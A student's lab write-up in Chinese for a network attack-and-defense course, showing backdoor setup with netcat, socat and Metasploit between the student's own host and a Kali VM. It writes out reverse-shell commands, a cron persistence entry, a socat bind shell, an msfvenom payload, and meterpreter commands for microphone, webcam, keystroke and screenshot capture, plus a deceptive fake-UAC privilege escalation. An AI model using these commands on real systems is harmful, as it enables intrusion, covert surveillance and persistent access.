20212326 2123-2124-2 《网络与系统攻防技术》实验二实验报告

20212326李齐琨 2024-04-02 20:40:52

1.实验内容

后门概念

后门,即指绕过正常的认证流程和安全控制,直接访问系统或程序的通道。它允许攻击者获取对系统或程序的未授权访问。后门可以存在于多种环境中,如应用程序、操作系统、编译器等,其中应用程序中的后门尤为常见。

常用后门工具

Netcat:
功能:进行基本的TCP、UDP数据收发工作,常用于扫描。
特点:与其他工具结合可开发出多种网络攻击手段,被誉为网络攻击中的“瑞士军刀”。
应用:可用来创建后门。
Socat:
功能:在两个数据流之间建立通道,支持多种协议和链接方式。
特点:作为Netcat的加强版,提供了更多的功能和灵活性。
应用:同样可用来获取主机操作Shell。
Meterpreter:
功能:用于生成后门程序的工具。
特点:包含后门的基本和扩展功能,可按需组合形成所需的可执行文件。
应用:生成后门文件,进行远程控制和数据窃取。

具体内容

使用Netcat获取Shell并设置cron任务:
通过Netcat建立与主机的连接,获取主机的操作Shell。
利用cron(Linux下的任务调度工具)设置定时任务,执行自定义的操作。
使用Socat获取Shell及任务计划启动:
借助Socat的功能,建立与主机的数据流通道,获取操作Shell。
利用任务计划(如Windows的任务计划程序)来启动和执行特定的任务。
使用Meterpreter生成并执行后门:
利用Meterpreter工具生成可执行的后门文件。
通过ncat或socat将后门文件传送到目标主机并执行,从而获取主机的Shell。
使用Meterpreter进行数据窃取和提权:
利用Meterpreter的后门功能,获取目标主机的音频、摄像头数据、击键记录等敏感信息。
尝试进行提权操作,以获取更高的系统权限。
使用MSF生成Shellcode并注入:
利用Metasploit Framework(MSF)生成Shellcode。
将生成的Shellcode注入到实践中的pwn1程序中,实现反弹连接Shell的功能,即目标主机主动连接攻击者的机器,从而获取Shell。

2.实验过程

2.1 准备工作

2.1.1分别确定主机和虚拟机的ip地址

主机IP地址:192.168.1.109

img

kali的ip地址:192.168.71.137

img

2.1.2 下载所需文件

Linux系统自带natcat和socat,但是Windows主机没有natcat没有socat,因此在实验开始之前,先根据老师所提供的实验链https://img-community.csdnimg.cn/images/532b8e1ae3a94be9a8b28182e6016dea.png "#left")
接,下载socat的相关安装包并安装解压到本机电脑上

img

2.2 使用netcat获取主机操作

2.2.1 在Windows中获取Linux操作

在Windows主机中使用ncat.exe -l -p 2311监听本机的2311端口

在虚拟机中使用命令行nc 192.168.56.1 2311 -e /bin/sh,采用反弹式连接,连接到Windows主机上。(192.168.56.1为Windows本机ip)

img

此时处于监听状态的Windows主机成功获取到了Linux虚拟机的Shell,可以输入命令行查看相关的信息

img

2.2.2 在Linux中获取Windows操作

在kali虚拟机中使用nc -l -p 2311监听虚拟机的2311端口
在Windows主机中使用命令行ncat.exe -e cmd 192.168.159.143 2311反弹式连接到kali虚拟机上
成功获取到了kali的Shell

img

2.2.3 获取Linux虚拟机操作,cron启动

在虚拟机上用命令号crontab -e编辑一条定时任务

crontab命令
crontab命令常见于Unix和类Unix的操作系统之中,用于设置周期性被执行的指令。通过crontab命令,我们可以在固定的间隔时间执行指定的系统指令或shellscript脚本。时间间隔的单位可以是分钟、小时、日、月、周及以上的任意组合。
用户所建立的crontab文件中,每一行都代表一项任务,每行的每个字段代表一项设置,它的格式共分为六个字段,前五段是时间设定段,第六段是要执行的命令段。
打开后,输入* * * * * /bin/netcat 192.168.1.109 2326 -e /bin/sh

img

在Windows本机端口使用命令行ncat.exe -l -p 2326打开2326端口进行监听,成功获取虚拟机的Shell

img

2.3 使用socat获取Windows主机操作,任务计划启动

在Windows主机中按Win+R,再输入compmgmt.msc打开计算机管理器
在系统工具中的任务计划程序中创建任务,命名为20212326lqk

img

img

新建触发器,设置为在工作站锁定时触发启动,并设置任务状态为启动。新建操作为启动程序,添加socat程序的路径(socat.exe),并添加参数:tcp-listen:2311 exec:cmd.exe,pty,stderr,把cmd.exe绑定到端口2311

img

启动任务:

img

在kali中输入socat -tcp:192.168.56.1 2311,连接到Windows主机,成功获取Windows的Shell

img

2.4 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在Windos使用命令行ncat.exe -lv 2326 >20212326_backdoor.exe,打开2326端口监听,等待接收可执行文件20212326_backdoor.exe

img

在kali上用命令行nc 192.168.56.1 2311 < 20212311_backdoor.exe,将生成的可执行文件20212311_backdoor.exe传送给Windows主机

img

在kali上使用msfconsole进入msf控制台
通过以下指令配置监听模块:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.71.137
set LPORT 2326

img

配置完成后,输入exploit进行监听。在Windows上打开20212311_backdoor.exe文件,kali虚拟机Linux端成功获取Shell

2.5 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

这部分实验都是在前一部分的基础上完成的

2.5.1 获取麦克风音频

record_mic

2.5.2 获取摄像头图片

webcam_snap

2.5.3 获取击键记录

开始获取:keyscan_start
结束获取:keyscan_dump
2.5.4 获取主机屏幕图像
screenshot

img

2.6.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

使用msf生成指定需要的shellcode
在root权限的kali终端输入以下:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.71.137 LPORT=2326 -x pwn1 -f elf > 20212326_pwn1
chmod +x 20212326_pwn1
sudo ./20212326_pwn

img

在另一个终端配置监听模块

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse tcp
set LHOST 192.168.71.137
set LPORT 2326

img

3.问题及解决方案

问题一:

img

解决方案:关闭所有防火墙

img

问题二:提权失败,无法以普通用户身份进行提权操作。

解决方案:要以管理员身份打开后门(可执行文件)后,有了充足权限才可进行提权操作
输入命令use exploit/windows/local/ask, 模拟一个UAC确认窗口
输入命令set FILENAME 20212402.exe,设置其中显示的应用程序的名字(最好是具有欺骗性的名字,这里以我的学号为例)
输入命令set SESSION 1
输入命令 set PATH D:\test
输入命令set LHOST 192.168.43.221
输入命令set LPORT 2482
输入命令run ,运行
输入命令getsystem 尝试提权
主机显示下方UAC确认窗口,提权成功

4.实验心得与体会

通过这次实践,我深入了解了后门原理及其相关技术,包括使用netcat、socat以及MSF meterpreter等工具进行后门植入、任务启动和数据收集。在实践过程中,我首先尝试了使用netcat获取主机操作Shell,并通过cron启动了一项自定义任务。这个过程让我理解了cron在Linux系统中的重要作用,以及如何利用它来周期性地执行特定任务。接着,我利用socat获取了主机操作Shell,并通过任务计划启动了另一个任务。通过对比netcat和socat的使用,我更加熟悉了这两个工具的特性和用法。在MSF meterpreter部分,我生成了可执行文件,并利用ncat或socat将其传送到主机并运行,成功获取了主机Shell。这一步骤让我深刻体会到了MSF meterpreter的强大功能,它能够执行各种复杂的操作,如文件上传下载、执行命令、获取系统信息等。此外,我还尝试使用MSF meterpreter获取了目标主机的音频、摄像头和击键记录等内容,并尝试进行提权操作。这些操作让我对MSF meterpreter的功能有了更加全面的了解。
通过这次实践,我对后门原理及免杀技术有了更加深入的了解。我认识到,后门往往是通过各种漏洞和弱点植入到系统中的,因此我们需要时刻保持警惕,加强系统的安全防护。同时,我也学会了如何检查系统是否被安装了后门,例如通过检查进程、网络连接和文件系统等。

...全文
34 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
网络信息安全综合实验 任 务 书 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 、 主要内容 实验一加密认证通信系统实现 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 实验 综合扫描及安全评估 利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出 全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从 而提高系统的安全性能。 实验网络攻防技术 矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够 的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地 解决各种威胁。 实验四 Windows系统安全配置方案 作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往 忽视了OS的安全性。其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方 面。除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此 ,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵 检测软件来加强系统的安全。 其中实验一要求编程实现,可直接调用相关功能函数完成。实验实验四可在机房 的网络信息安全综合实验系统上完成。 三、 进度计划 "序号 "设计(实验)内容 "完成时间 "备注 " "1 "接受任务,查阅文献,开始实 "第一天 " " " "现密码算法和认证算法 " " " "2 "完成加密认证通信系统 "第至七天 " " "3 "上午完成综合扫描及安全评估 "第八天 " " " "实验,下午进行网络攻防实验 " " " "4 "上午完成网络攻防实验,下午 "第九天 " " " "进行系统安全配置实验 " " " "5 "撰写实验报告并验收 "第十天 " " 四、 实验成果要求 1. 要求程序能正常运行,并实现任务书要求功能。 2. 完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重 对设计思路的归纳和对问题解决过程的总结。 五、 考核方式 平时成绩+程序验收+实验报告。 学生姓名: 指导教师: 2016 年 6 月 13 日 实验报告 题 目: 网络信息安全综合实验 院 系:计算机系 班 级: 学 号: 学生姓名: 指导教师: 成 绩: 实验日期:2021 年 6 月 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 实验内容 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 三、实验结果 实验一:本通信系统为用C#语言编写的P2P方式通信的系统,其具体功能如下: 1、识别本机IP地址并赋值到文本框中,产生一个随机数作为端口号,端口号范围限制在 1000到65535之间。 2、通过运用网络编程的知识尝试用产生的IP与端口号进行监听。 图1 发送方界面 图2 接收方界面 3、设置刷新区域,定时刷新好友在线,可以设置刷新间隔,启动和停止刷新。这里 可以通过拖拽VS里自带的控件"timersecond",实现计时。 4、发送消息。消息的传送是具有加密与认证的。 加密:考虑到DES的安全性问题,加密消息是采用AES方式加密的,本系统采用的是 C#封装好的AES程序,调用接口,实现对明文的加密。解密同理。 认证:认证是将明文哈希散列后采用RSA算法对其进行签名,再用公钥加密进行认证 的,其中哈希散列采用的是SHA1方式。下图为加密与认证的具体流程。 图3 加密与认证流程 图4 发送方可显示明文与密文 图5接收方解密出明文 5、可以发送文件。通过获取文本框中的文件地址,建立文件流,向接收端发送文件 。 接收端进行文件监听,接收文件,与发送文件编写过程相似,只是把"写"换成了"读"文 件。VS里自带的控件"saveFileDialog"可以帮助用户提示选择保存文件的位置。 图6 输入文件位置 图7 询问是否接受文件 图8 接收与发送文件成功 实验:认识性实验实验为认识练习信息安全实验平台的部分实验。 SuperScan端口扫描实验 扫描结果如下图: 图
网络安全实验 石河子大学信息科学与技术学院 网络安全课程实验 "实验名称: "使用任选工具进行网络检测与扫描 " "学生姓名: "刘金红 " " "学 号: "05 " " "学 院: "信息科学与技术学院 " "专业年级: "计算机科学与技术专业2012级 " "指导教师: "曹传东老师 " "完成日期: " " 目录 1 实验环境 3 2 实验目的 3 3 实验步骤 3 4 实验内容 4 DOS窗口中常用网络命令的操作使用及IPCS攻击实践 4 DOS窗口中ping 命令及其常见带参数子命令的用法实践 4 DOS窗口中IPconfig 命令及其常见带参数子命令的用法实践 6 DOS窗口中nslookup命令及其常见带参数子命令的用法实践 8 DOS窗口中netstat命令及其常见带参数子命令的用法实践 10 DOS窗口中arp命令及其常见带参数子命令的用法实践 12 DOS窗口中route命令及其常见带参数子命令的用法实践 13 DOS窗口中tracert命令及其常见带参数子命令的用法实践 14 DOS窗口中ftp命令及其常见带参数子命令的用法实践 15 DOS窗口中telnet命令及其常见带参数子命令的用法实践 16 DOS窗口中sc命令及其常见带参数子命令的用法实践 20 DOS窗口中nbtstat命令及其常见带参数子命令的用法实践 22 DOS窗口中net命令及其常见带参数子命令的用法实践 24 DOS窗口中at命令及其常见带参数子命令的用法实践 25 使用课本第四章各案例中介绍的工具软件进行网络信息收集和扫描检测 25 在虚拟机系统Window200x中使用GetNTuser工具扫描本机系统上存在的用户名, 并猜解其中具有空密码和弱口令的用户;在该软件中使用自定义字典文件穷举猜 解某个用户的口令(爆破); 25 使用Port Scan 工具软件进行对某目标机开放端口的扫描; 28 在虚拟机系统中使用Shed 工具软件扫描某个目标主机的共享目录信息; 31 编译执行课本中案例4-4介绍的代码,并利用抓包工具进行验证; 32 使用漏洞扫描工具X-Scan对指定IP 地址段或单机进行全面的安全漏洞扫描和检测; 36 使用嗅探工具Win Sniffer 监听客户端登陆FTP服务器的用户和密码信息; 39 使用自选的任一款扫描工具进行网络攻击前的信息收集 42 使用CIS工具对本机系统进行安全风险评估 42 使用Superscan扫描工具实现秘密端口扫描 44 实验一:使用任选工具软件进行网络检测和扫描 1 实验环境 1台带有活动网络连接(插有网卡且工作正常)、安装有VMware虚拟机软件的PC机,其中 主机环境配置如表1-1所示: 表1-1 本机环境:主机操作系统的配置(作为客户机端) "操作系统 "Windows系列操作系统,版本均可,推荐Win7/Windows XP " "Telnet客户端 "F-Term(版本不限)或 " "工具 " " "FTP客户端工具"Cute FTP pro/Flash FXP (版本不限)或 " "Web浏览器 "IE/Mozilla FireFox(版本不限)或其他浏览器软件 " "抓包软件 "Sniffer Pro 支持千兆网卡) " "屏幕截图工具 "HyperSnap-DX (可抓滚屏的单文件版本) " "IP地址 " (机房做的) (后来改了) " 虚拟机配置如下表1-2所示: 表1-2 虚拟机环境:虚拟机操作系统的配置(作为服务器端) "操作系统 "Windows 200X Advance " " "Server,且安装配置了WWW/FTP/DNS/Telnet等网络服务 " "IP地址 " " 2 实验目的 1. 通过该实验,掌握在DOS命令窗口中常用网络命令的使用方法; 2. 通过该实验,掌握利用教程第四章介绍的各个案例中的工具软件进行网络检测扫描的 基本方法; 3. 通过该实验,掌握使用自选的一款工具软件进行网络攻击前的信息收集的基本方法; 4. 进一步加深对TCP/IP协议的理解和认识; 3 实验步骤 1. 实验前先阅读材料相关章节以及实验一参考资料(PPT及命令简介文档、实验指导书) ,充分预习,了解实验步骤并准备相关的工具软件; 2. 每个人在自己的本机系统上安装各种工具软件,以自己的虚拟机系统作为扫描目标; 3. 在各工具软件中分别进行参数设置,以实现客户机端获取靶机服务器的各种信息; 4. 在虚拟机系统中启动Sniffer Pro 或Wireshark,进行数据包捕获模式,抓取攻防双方的各种通信协议数据包,查看数 据包中的各种敏感扫描信息的报文内容; 5. 独立完成本次实验报告; 6. 实验完成后,思考以下问题,如何防范对方从网络上获得自己机器的各种信息 4
xxxxxxx 学生实习(实训)总结报告 学 院:xxxxxxxxxxxxxxxxxx 专业班级:_xxxxxxxxxx_ 学生姓名:____xxxxxxxxx_____ 学 号:xxxxxxxxxx_ 实习(实训)地点:___xxxxx____ ____________ __ 报告题目:__xxxxxxxxxxxxxxxxxxxx__________ ____ 报告日期: xxx 年 xxx月 xxx日 指导教师评语: ____________ _______________________ ______________________________________________________________________ ______________________________________________________________________ ___________________ 成绩(五级记分制):______ _______ 指导教师(签字):_____________________ xxxxx 实习(实训)任务书 设计题目:数据恢复技术应用 "学生姓名 "xxxxx " "课程名称 "xxxxx "专业班级 "xxxxx " "地 点 "xxxxx "起止时间 "xxxxx " "设 "数据恢复是在系统数据丢失或其他诸多原因而导致的灾难后,快速进" "计 "行数据恢复,以保障系统正常运行的常用手段。通过该综合训练,使" "内 "学生了解数据恢复的重要性,并认识到电磁泄漏现象引起的数据恢复" "容 ",硬件损坏、文件的删除等实现数据恢复的内容。 " "及 "要求:理解数据备份的重要性,以及磁盘数据恢复的原理,认识数据" "要 "恢复技术对信息安全的影响。能够使用数据恢复软件EasyRecovery进" "求 "行文件恢复。 " " "提高要求:能够对磁盘数据进行彻底清除。 " "设 "掌握EasyRecovery的应用; " "计 "理解磁盘分区的原理及特征; " "参 "设计利用EasyRecovery或手动方法进行数据恢复的解决方案。 " "数 " " "进 "12月19-20日:了解设计任务、掌握磁盘分区特征、熟悉工具软件;" "度 "12月21-28日:数据恢复的实施; " "要 "12月29-30日:撰写综合训练总结报告,作品检查、提交、答辩。 " "求 " " "参 "[1] 吴灏.《网络攻防技术》[M].北京:机械工业出版社,2009. " "考 "[2]胡建伟.《网络安全与保密》[M]. 西安电子科技大学出版社,2006." "资 "[3]牛少彰,江为强.《网络的攻击于防范——理论与实践》[M]. 北京: " "料 "北京邮电大学出版社,2006. " " "[4] 蒋朝惠. 《信息安全综合实验》[M]. " " "北京:中国铁道出版社,2010. " " "[5] 蒋朝惠. 《信息安全原理与技术》[M]. " " "北京:中国铁道出版社,2009. " "其 " " "它 " " "说 " " "明 "1.本表应在每次实施前一周由负责教师填写份,院系审批后交院 " " "系办备案,一份由负责教师留用。2.若填写内容较多可另纸附后。3" " ".一题多名学生共用的,在设计内容、参数、要求等方面应有所区别 " " "。 " 系主任: 指导教师:xxxxx 年 月 日 前言 随着计算机技术的发展,同时硬盘由于其容量大价格便宜也成为人们存储数据的主要 设备。然而由于种种原因,硬盘的数据可能会被损坏,这也给个人和社会带来很大的损 失。因此,数据损坏后的数据恢复显得非常重要。虽然在数据恢复领域有很多的厂商已 经有比较成熟的技术。然而对于并不了解硬盘原理普通人来说,如果试图恢复数据,但 又无法采用很好的方法,选择正确的工具,就很难很好的恢复数据。然而不管用什么方 法进行数据恢复,都不能保证100%的能成功,所以在使用电脑时,我们应该注意数据备 份工作。 本文分析了硬盘的有关内部结构与文件存储系统以及硬盘数据损坏的有关原因,然后 介绍如何使用数据恢复软件EasyRecovery进行文件恢复。 目录 前言 I 1 设计内容及要求 1 实训内容 1 实训要求 1 2 数据恢复原理 2 3 数据恢复常见实例 4 主引导区的恢复 4 分区表破坏修复 5 DBR修复 5 文件删除后的修复 6 因病毒侵害而导致的文件丢失 6 利用EasyRecovery恢复丢失文件 7 4 总结 14 致谢 15 参考文献 16 1 设计内容及要求 硬盘数据丢失对于硬盘来说,仅仅就是硬盘上的某些地方的磁性消失。硬盘数据的丢 失的原因本来就有很多种,可能因为人的误操作而丢失,也可能是因为病毒的入侵而破 坏数据。并且

69

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧